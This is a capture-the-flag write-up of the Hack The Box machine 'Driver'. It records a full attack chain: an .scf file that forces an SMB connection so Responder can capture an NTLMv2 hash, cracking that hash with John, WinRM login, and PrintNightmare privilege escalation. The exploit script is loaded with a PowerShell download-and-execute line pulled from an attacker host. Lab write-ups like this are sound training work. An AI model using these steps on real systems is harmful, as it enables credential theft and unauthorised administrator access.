Driver is an Easy box from Hack the Box. The name gives you a very good idea of what you will encounter, but it’s still a fun box to do. It is an easy one, but the vulnerability is one that a lot of sysadmins know as “working late”.
[0x1] Reconnaissance & Enumeration
The first step is to run Nmap and see what we have to work with. There are only a few open ports, which make sense on a default Windows box. Given the fact that it is also running IIS, this can be a good direction to check out first.
sudo nmap -p- -sV -sC -oA driver-allports 10.10.11.106
# Nmap 7.91 scan initiated Thu Oct 21 08:25:08 2021 as: nmap -p- sV -sC -oA driver-allports 10.10.11.106
Nmap scan report for driver (10.10.11.106)
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-21T20:25:19
|_ start_date: 2021-10-21T19:16:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 21 08:25:55 2021 -- 1 IP address (1 host up) scanned in 47.10 seconds
The website does contain a login, but a simple admin/admin does the trick. So no brute-forcing is needed for this one. I also checked out dirbuster and gobuster, but nothing interesting shows up.
[0x2] Initial Foothold
After enumerating the different options, I did not find any way into this box. My go-to place still was the firmware upload portal. After looking around and searching for SMB exploits I didn’t use before, I found an interesting SMB exploit which persist in uploading an scf-file that would trigger an SMB-connection to my attacker machine. With this, Responder should be able to grab the NTLM-hash of the account which triggers the request.
The first step is to create the malicious scf-file to upload on the new firmware submission page.
[Shell]
Command=2
IconFile=\\10.10.16.25\share\1337.ico
[Taskbar]
Command=ToggleDesktop
The next step is to fire up Responder and make sure it runs on the tun0-interface and responds to SMB-requests.
sudo responder -I tun0 255 ⨯
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.25]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-RJ8SRGRRKTE]
Responder Domain Name [GXP0.LOCAL]
Responder DCE-RPC Port [47993]
[+] Listening for events...
Now it’s time to see if this malicious file can be uploaded to the Firmware Update Center.
After uploading the file, it gets triggered instantly and Responder was successful in grabbing the username and NTLM v2 hash.
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash :
tony::DRIVER:c2daf0b96110cff6:B04F86050FF5E55A09964FFD0C7007FE:01010000000000008079F8F45AC6D701C4034217F0C8D62A0000000002000800470058005000300001001E00570049004E002D0052004A003800530052004700520052004B005400450004003400570049004E002D0052004A003800530052004700520052004B00540045002E0047005800500030002E004C004F00430041004C000300140047005800500030002E004C004F00430041004C000500140047005800500030002E004C004F00430041004C00070008008079F8F45AC6D70106000400020000000800300030000000000000000000000000200000624782CCFE032342C7983F8CCA2532D042DAFA762A6580F00150BCF162DFF2C30A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0032003500000000000000000000000000
Since it has been a while for me to crack a hash, I had to look up the different formats used by John the Ripper. You can easily do this with the –list=formats option. In this case, NTLMv2 can be cracked by using the netlmv2 format.
sudo john --list=formats |grep "ntlm"
mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2, net-md5, netntlmv2,
netntlm, netntlm-naive, net-sha1, nk, notes, md5ns, nsec3, NT, o10glogon,
With everything grabbed and ready, I launch john to start cracking the hash. This process only takes a few seconds, since all needed passwords on Hack the Box are from the rockyou.txt wordlist. In this particular case, the password was found in less than 1 second.
sudo john tony-ntlmv2-hash.txt --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony (tony)
1g 0:00:00:00 DONE (2021-10-21 09:17) 33.33g/s 1058Kp/s 1058Kc/s 1058KC/s !!!!!!..225566
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Well, this comes in handy to start poking around on the box. A nice set of credentials. The user tony with password: liltony.
sudo john tony-ntlmv2-hash.txt --show 1 ⨯
tony:liltony:DRIVER:c2daf0b96110cff6:B04F86050FF5E55A09964FFD0C7007FE:01010000000000008079F8F45AC6D701C4034217F0C8D62A0000000002000800470058005000300001001E00570049004E002D0052004A003800530052004700520052004B005400450004003400570049004E002D0052004A003800530052004700520052004B00540045002E0047005800500030002E004C004F00430041004C000300140047005800500030002E004C004F00430041004C000500140047005800500030002E004C004F00430041004C00070008008079F8F45AC6D70106000400020000000800300030000000000000000000000000200000624782CCFE032342C7983F8CCA2532D042DAFA762A6580F00150BCF162DFF2C30A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0032003500000000000000000000000000
1 password hash cracked, 0 left
Since this box has SMB and RPC open, I tried to further enumerate these ports with smbmap, smbclient, and rpcclient. This did not really do anything interesting, since all shares were inaccessible, but rpcclient did show me that there is a user called martin on this box. Not really helpful for now, but who knows.
sudo smbclient -U tony -L driver.htb
Enter WORKGROUP\tony's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup available
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[DefaultAccount] rid:[0x1f7]
user:[Guest] rid:[0x1f5]
user:[martin] rid:[0x3ec]
user:[tony] rid:[0x3eb]
The next step is to try these credentials on Windows Remote Management since this is an active port based on the Nmap scan. I use Evil-WinRM for this as my weapon of choice and connect successfully to the WinRM
sudo evil-winrm -i 10.10.11.106 -u tony -p liltony
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
[0x3] Path to User flag
The first thing to do when logging in is to check whether that flag is there to grab. And in this case, tony did have the user flag on his desktop.
*Evil-WinRM* PS C:\Users\tony\desktop> dir
Directory: C:\Users\tony\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/21/2021 12:16 PM 34 user.txt
Copy/Past/Submit to own the user part of this box.
*Evil-WinRM* PS C:\Users\tony\desktop> type user.txt
da0822b52e0925883de50d17e138bb75
[0x4] Path to Root flag -privilege escalation
The next step is to poke around the machine a bit more. Since its name is driver, my first guess would be a driver privilege escalation. In the c:\temp folder, I found a printer driver setup.
*Evil-WinRM* PS C:\temp\z87179L19\disk1> dir
Directory: C:\temp\z87179L19\disk1
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/2/2019 4:07 PM 9 copcl6ud.txt
-a---- 3/3/2016 7:26 PM 46210 mfricr64.dl_
-a---- 7/2/2019 4:07 PM 657 oemsetup.dsc
-a---- 7/2/2019 4:07 PM 2702 oemsetup.inf
-a---- 9/25/2012 2:52 PM 546494 rd01kd64.dl_
-a---- 6/28/2019 1:06 PM 43638 Readme.html
-a---- 8/22/2006 1:59 PM 29362 ricdb64.dl_
-a---- 7/22/2019 6:54 AM 20239 ricu0n.cat
-a---- 5/23/2018 10:25 AM 828124 ricu0ncb.dl_
-a---- 6/10/2019 1:17 PM 3062452 ricu0ncd.dl_
-a---- 7/2/2019 4:07 PM 4225136 ricu0ncd.psz
-a---- 5/15/2009 10:19 AM 4 ricu0nce.eij
Privilege escalation, printer drivers, hmmm…….Print NIghtmare? I decided to try and use the CVE-2021-1675 PowerShell script created by Caleb Stewart to see if Print Nightmare will bite. The first step is to clone the repo and grab the PowerShell script.
sudo git clone https://github.com/calebstewart/CVE-2021-1675.git
Having the script ready, I tried to upload it to the box and run it. Unfortunately, the machine does not allow for scripts to run. So I had to try a different way to run it. One of the alternative ways to run a script is by loading it via Invoke-Expression in PowerShell and running the function after that. To do this remotely with iex, I needed to serve the PowerShell script via an HTTP server
sudo python3 -m http.server 8008 1 ⨯
Serving HTTP on 0.0.0.0 port 8008 (http://0.0.0.0:8008/) ...
From the Driver box, I loaded up the script and run Invoke-Nightmare to execute the script. After the launch, it will exploit the CVE-2021-1675 (Print Nightmare) vulnerability and gain local code execution. It creates a new user, sets the password, and adds the user to the Local Administrators group. After exploitation, it cleans up the malicious dll.
Evil-WinRM* PS C:\temp\d0p4m1n3> iex(New-Object Net.WebClient).DownloadString('http://10.10.16.25:8008/CVE-2021-1675.ps1')
*Evil-WinRM* PS C:\temp\d0p4m1n3> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
After running the exploit, I used Evil-WinRM again to setup a second connection to the box with the newly created account.
sudo evil-winrm -u adm1n -p P@ssw0rd -i 10.10.11.106 1 ⨯
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents>
This works like a charm, and even though I am logged in as adm1n, I have local administrator privileges and can brose to the Administrator account’s Desktop folder. Guess what can be found there.
*Evil-WinRM* PS C:\Users\administrator\desktop> dir
Directory: C:\Users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/21/2021 12:16 PM 34 root.txt
With the root flag submitted, this box is officially rooted! Easy, but a very nice one.
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
d54865176b6659fb88363b3739c9eb07
Add comment